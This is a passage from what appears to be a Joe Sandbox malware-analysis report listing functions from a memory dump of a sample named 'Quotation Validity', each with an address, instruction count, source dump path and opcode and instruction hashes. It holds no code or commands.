                                                                                • Instruction Fuzzy Hash: EC513875A00216DFDB18CFA8D5856AABBF1FF48314B14816ED819A7785E334EA80CF90
                                                                                Function 01376154 Relevance: .1, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2e868e3e10044c17be664e1b9c2f100a744acb5a25496da33a695373818ea5b5
                                                                                • Instruction ID: ffccca0ae5917d7cf1ac097fd290af36c3d571c0d9134f779c05e4b8943ce3d0
                                                                                • Opcode Fuzzy Hash: 2e868e3e10044c17be664e1b9c2f100a744acb5a25496da33a695373818ea5b5
                                                                                • Instruction Fuzzy Hash: FF5106B190060ADFEB359B2CDC11BE9BBB5EF1131CF1482A5E519A76D1E7389981CF40
                                                                                Function 0136B136 Relevance: .1, Instructions: 131COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 33eec569114b84544a2ebec68a239258c32a6496c4db8b48e8164b434d29c386
                                                                                • Instruction ID: 7bc33e8239da7e729e117d3121c6be5e816c37bfb5bea978337ed20a42f3c12f
                                                                                • Opcode Fuzzy Hash: 33eec569114b84544a2ebec68a239258c32a6496c4db8b48e8164b434d29c386
                                                                                • Instruction Fuzzy Hash: B8418071640306EFDB22AF69C840B6ABBECEF10B9CF008469E659DB665D771D840CF60
                                                                                Function 0139A470 Relevance: .1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 87e98ef8a10f41d5ba7d7290a3f11bde4aa0fca0a3125e4a1db79bb20a619cc5
                                                                                • Instruction ID: de60c1c0641f0535ef4fd97f82ce521f32db9c573f6a3cdec25dd99287846749
                                                                                • Opcode Fuzzy Hash: 87e98ef8a10f41d5ba7d7290a3f11bde4aa0fca0a3125e4a1db79bb20a619cc5
                                                                                • Instruction Fuzzy Hash: 0C418D32A40219CFDF25DF6CD4947EE7BB4FB1835CF180269D411AB6A6DB349940CBA1
                                                                                Function 0136A020 Relevance: .1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                • Instruction ID: a9f6815911dbf39c4c183b23de0dc786d7b99f3c357dd481cc49edab8625bdfa
                                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                • Instruction Fuzzy Hash: 81416C31A04216DBDB11DF2C84417BAFB79EB50B9CF15C06EE945AB34CD6329D44CB90
                                                                                Function 013F05A7 Relevance: .1, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3636b6b78ef521d4e261f6214706c3a0549ccd389f8f7a9ffa02d5ca593b745d
                                                                                • Instruction ID: c918532bc1b8936321a316ff272740a2d9cfa870160d211ab713c0a412fddc99
                                                                                • Opcode Fuzzy Hash: 3636b6b78ef521d4e261f6214706c3a0549ccd389f8f7a9ffa02d5ca593b745d
                                                                                • Instruction Fuzzy Hash: E541C4726047429FC324DF6CC880A6AB7E6FFC8704F14061DFA5597691E730E904C7A6
                                                                                Function 013802E1 Relevance: .1, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                • Instruction ID: d755152eab319640a09b59008ba737fd9825d0180e2e405f0fa9ba43c9832504
                                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                • Instruction Fuzzy Hash: AA31F532A04344ABDB219B6CCC40B9BBFE9AF14358F0441B5F455D7752D6B49888CBA0
                                                                                Function 01399274 Relevance: .1, Instructions: 105COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6ead65fa6e5d41ce2c33f1574f4c8f3bfcc775152c67b0aaa1ee5761042b84c5
                                                                                • Instruction ID: cada67ebc19651c199819eadd21a0909db9070a9e45b982f339ed3b45d2dce53
                                                                                • Opcode Fuzzy Hash: 6ead65fa6e5d41ce2c33f1574f4c8f3bfcc775152c67b0aaa1ee5761042b84c5
                                                                                • Instruction Fuzzy Hash: 1C316272A0022DAFDF219F68CC80B9ABBB9EF85758F1501D9A54DA7290DB309E44CF51
                                                                                Function 01374260 Relevance: .1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50bb82dad7920233e4865a58661592e647b30bd6e9ea0d4cf5f78147de27e5f0
                                                                                • Instruction ID: d5879b461c54cfc11a064c3fbbcf4d41df12e222c11dd18e4891747f4149ded7
                                                                                • Opcode Fuzzy Hash: 50bb82dad7920233e4865a58661592e647b30bd6e9ea0d4cf5f78147de27e5f0
                                                                                • Instruction Fuzzy Hash: 6141DD32201B05DFD726CF28D881FD67BE8AF49718F11842DEA998B660D774F804CB90
                                                                                Function 013950E4 Relevance: .1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                • Instruction ID: b118d19bdc1040a23b1b2616c15807078caeb4f77bfb58e6510e5e72c445464b
                                                                                • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                • Instruction Fuzzy Hash: F73106B16093469BEF22EA1CC800767BBD8AB85758F09812BF5858B395D274C881C792
                                                                                Function 014361C3 Relevance: .1, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dff6f0c624480c73140621551651b92dc08f7a906333239f441d9ff367cfef29
                                                                                • Instruction ID: f0558f80ba0f536c9750fdacf98335275504d51dba43ef252383fed5d0ac075f
                                                                                • Opcode Fuzzy Hash: dff6f0c624480c73140621551651b92dc08f7a906333239f441d9ff367cfef29
                                                                                • Instruction Fuzzy Hash: 4531E675A00216BBDB15EF98CC80FAEB7B5FB88B44F464169E904EB254D770ED00CB94
                                                                                Function 014360B8 Relevance: .1, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 244234e42543d42b05092409da3c232bbc9fa701d6b76d5459954ca1aaedf5cf
                                                                                • Instruction ID: d00646b219095c0495b6be50507e71a7604201d2437a47f2b6deeff066eef9e8
                                                                                • Opcode Fuzzy Hash: 244234e42543d42b05092409da3c232bbc9fa701d6b76d5459954ca1aaedf5cf
                                                                                • Instruction Fuzzy Hash: FE31C471B00617BBDB22AF9DC850A6BB7F9AF88758F15006AE505DB361DA30DE018790
                                                                                Function 01378550 Relevance: .1, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8e01eec6e1609382df833c07fcbae3b5801f01f53c4e374a40fe052291c49e8e
                                                                                • Instruction ID: 970012ee57a8a2a97d517afd804ea7ff92ddedaa5046f0a63dbb85d0a9fa02e4
                                                                                • Opcode Fuzzy Hash: 8e01eec6e1609382df833c07fcbae3b5801f01f53c4e374a40fe052291c49e8e
                                                                                • Instruction Fuzzy Hash: 063189B2609301CFE720CF19C844B6BBBE5FF98718F0549AEE98497251D774E944CB92
                                                                                Function 013C7190 Relevance: .1, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                • Instruction ID: 78f6b3bcfc185553b519ba53c3cf71e5d599c62310862518721371bb7b54cd8c
                                                                                • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                • Instruction Fuzzy Hash: 89312475604206CFC710CF2CC480956BBF6FF99758B2986A9EA589B325E730ED06CF91
                                                                                Function 0139438F Relevance: .1, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bdbf1af8ab631623e84118113d9844d3bd5359a239d0cabe211f24a5c72e75ad
                                                                                • Instruction ID: 8ed9cf74f5fcc85965777011a8a1e7a196e8b5f4021a1b4ccf3f21bb62a2f392
                                                                                • Opcode Fuzzy Hash: bdbf1af8ab631623e84118113d9844d3bd5359a239d0cabe211f24a5c72e75ad
                                                                                • Instruction Fuzzy Hash: F631E372B002069FDB20EFB8CA81A6EBBF9EF8470CF018529D105E7654D730E942CB90
                                                                                Function 013792C5 Relevance: .1, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                • Instruction ID: 5a4d71cb1dd4508d60e069621827f711883690a25f267aedab43ec4052913d77
                                                                                • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                • Instruction Fuzzy Hash: 6E317A7260834A8FC711DF18D840A5ABBE9EB99728F000569F951973A1D734DC14CBA2
                                                                                Function 0136C156 Relevance: .1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 81294060deffc28cc995d8350547f92cbc40d3316c47543cd79be00b094b246e
                                                                                • Instruction ID: fe1abc1c59731f4fb9693745689a6006386809b9a0fef75b811a599ea35700b0
                                                                                • Opcode Fuzzy Hash: 81294060deffc28cc995d8350547f92cbc40d3316c47543cd79be00b094b246e
                                                                                • Instruction Fuzzy Hash: B631F6B15003018BDB21AF6CC841BA977B4AF5071CF54816DE98A9B356DA349D86CBD0
                                                                                Function 0142C3CD Relevance: .1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                • Instruction ID: e5170e85ea97b796418da9f84b7e01b9e4ab61450f174ecd7563a35259adcf27
                                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                • Instruction Fuzzy Hash: 49210236A00662B6DF15AB998C40BBFBB75EF60714FC0842FF65587661E634D990C3A0
                                                                                Function 0136E420 Relevance: .1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e59ec1bd13369911bec418edcfb816f6218a21b848a5a58befdacb1425f0534d
                                                                                • Instruction ID: 27de6722b284ed0241ed5885a4c26737a56f95512b052eb943045737c26812ef
                                                                                • Opcode Fuzzy Hash: e59ec1bd13369911bec418edcfb816f6218a21b848a5a58befdacb1425f0534d
                                                                                • Instruction Fuzzy Hash: 9431D435A0012C9BDB32DB28CC41FEE77BDEB15B48F0140B1E645A7294E674EE848F90
                                                                                Function 013A4588 Relevance: .1, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                • Instruction ID: ecd414957e9956d4243f8645182e834072e2d386ac67cb0c12074915aef217d9
                                                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                • Instruction Fuzzy Hash: 33218371A00609EFCB15CF58C980A8EBBB5FF48728F548469EE159F251D6B1EE05CB90
                                                                                Function 0136E388 Relevance: .1, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                • Instruction ID: 7746127ed4c6a911f0ad6cbe8c1aaa75b5304c1fb185bf2b36c2f54929f52b19
                                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                • Instruction Fuzzy Hash: 57319C35600605EFD721CF68C884F6AB7B9EF45358F1085B9E5129B694E770EE06CB50
                                                                                Function 013AD530 Relevance: .1, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08c815d1ecc2462939e9cdcc67254948364254e2fbbad6da60ad4fec5fcb614a
                                                                                • Instruction ID: 9583cc38baa4c0a2ee1f376a4f07124670c17531fcbc7edba7b44325b4623fef
                                                                                • Opcode Fuzzy Hash: 08c815d1ecc2462939e9cdcc67254948364254e2fbbad6da60ad4fec5fcb614a
                                                                                • Instruction Fuzzy Hash: 1021D6715043159BCA21FB6C9944B17B7ECFB6465CF410826FA4497AB0EB30DD04CBA2
                                                                                Function 0139F32A Relevance: .1, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                • Instruction ID: 0fd69c0c03a9f0e55c38b76d456b97708598d5d549d4ece6815d60750c558dd2
                                                                                • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                • Instruction Fuzzy Hash: 7F21CF722002059FDB19DF29C480B66BBEDEF85369F15816DE10ACB790EB74E801CB94
                                                                                Function 013F019F Relevance: .1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8e965b60c57130777c381da14e52054c9b96f52a731689cd4c76ae9f2339689d
                                                                                • Instruction ID: 462ba46039fe655e1eda236ee42202505375d52d1cbab1bfe806de445de0240a
                                                                                • Opcode Fuzzy Hash: 8e965b60c57130777c381da14e52054c9b96f52a731689cd4c76ae9f2339689d
                                                                                • Instruction Fuzzy Hash: F7218B75600645ABD715DB6CC880A6AB7B8FF58748F144069FA04DB7A1E634ED40CB64
                                                                                Function 014171F9 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9871a76a7fb4c0b234de680f7e6ad48906f3a0dda1b7ef8c340c4f624be406e3
                                                                                • Instruction ID: 02d149ccd5949d83a7ef0a30becd4677e736562730c73a9936986fb5b988c8c5
                                                                                • Opcode Fuzzy Hash: 9871a76a7fb4c0b234de680f7e6ad48906f3a0dda1b7ef8c340c4f624be406e3
                                                                                • Instruction Fuzzy Hash: 77212D31A047418BC321DF298440BABBBD9FFD5315F14491EF4A683265DB70A9478791
                                                                                Function 013F0283 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4e9f394985e7204b255a505af796dbe690e2529a9f6edcb10902339398f17475
                                                                                • Instruction ID: 2bc68e5af37ab5fa7e10f4b8a0268f01d188db7c591897d8f91d86614fa7ee49
                                                                                • Opcode Fuzzy Hash: 4e9f394985e7204b255a505af796dbe690e2529a9f6edcb10902339398f17475
                                                                                • Instruction Fuzzy Hash: 0A21F5729043469FD715EFADC944F6BBBEDEF90648F08045ABE80C7262D730D909C6A1
                                                                                Function 013ED0C0 Relevance: .1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                • Instruction ID: 8cf9d863f9a492b5c80776acfa89357ff39b84eab7e19926faa820bad951b5c8
                                                                                • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                • Instruction Fuzzy Hash: FF21C272644715ABD3119F1CCC45B9BBBE4FB89768F10022AF9499B7E0D734E80087A9
                                                                                Function 013AA30B Relevance: .1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 978025a80af84a6e10dc1e7f0837bd51affee20cc8469256d2503e50ffecd3ef
                                                                                • Instruction ID: cb6c36a6282100593a3a145214cf431e5295d41ed0f72b877e8c9269edb00d13
                                                                                • Opcode Fuzzy Hash: 978025a80af84a6e10dc1e7f0837bd51affee20cc8469256d2503e50ffecd3ef
                                                                                • Instruction Fuzzy Hash: 81216876201B119BCB25DF29C901B56B7F5EF58B08F248468A509CBBA2E371E842CF94
                                                                                Function 013915A9 Relevance: .1, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                • Instruction ID: 3eb0d41e5c849a7947cc1d04231c01f23e44184c28d6c7f34422e70149836240
                                                                                • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                • Instruction Fuzzy Hash: 6121F372604686DFEB229F6DDA44B217BE9AF4065CF0A00A1ED059B792E734DC40C650
                                                                                Function 013A0124 Relevance: .1, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                • Instruction ID: a3d8d130c0d89f2069e1385f0a80e10530802199866276a7feac7f95bcdc5ae7
                                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                • Instruction Fuzzy Hash: 5211BF76601605AFE7269F58CC85FEABBB8EB90758F104029F6059B190E671ED44CB60
                                                                                Function 013780E9 Relevance: .1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2956b2d31e30425c7a519c1db3107f85e47aadf270570040a2a8dd2f418734b0
                                                                                • Instruction ID: 595a8a3d822d30d42d2c15c7be99874dbb65f58cf255e597392e4021f7789f9f
                                                                                • Opcode Fuzzy Hash: 2956b2d31e30425c7a519c1db3107f85e47aadf270570040a2a8dd2f418734b0
                                                                                • Instruction Fuzzy Hash: FA218175A00209DFCB24CF59D581AAEBBF5FB88318F2441ADD505A7351C775AD06CBD0
                                                                                Function 01369240 Relevance: .1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 95006aba623f2339ad70535cf47ea638f2e99b4f34d966b268f4675a96f9b97a
                                                                                • Instruction ID: 0cd363e907337f7bf3b7f5b56213e4da59248e37fcd7201b82051dc115da6845
                                                                                • Opcode Fuzzy Hash: 95006aba623f2339ad70535cf47ea638f2e99b4f34d966b268f4675a96f9b97a
                                                                                • Instruction Fuzzy Hash: 7811047A410245AAD7319F55E901A7277ACFB64B8CF108029E908973BCE334DD01CB66
                                                                                Function 0139B052 Relevance: .1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1699227105.0000000001340000.00000040.00001000.00020000.00000000.sdmp, Offset: 01340000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1340000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
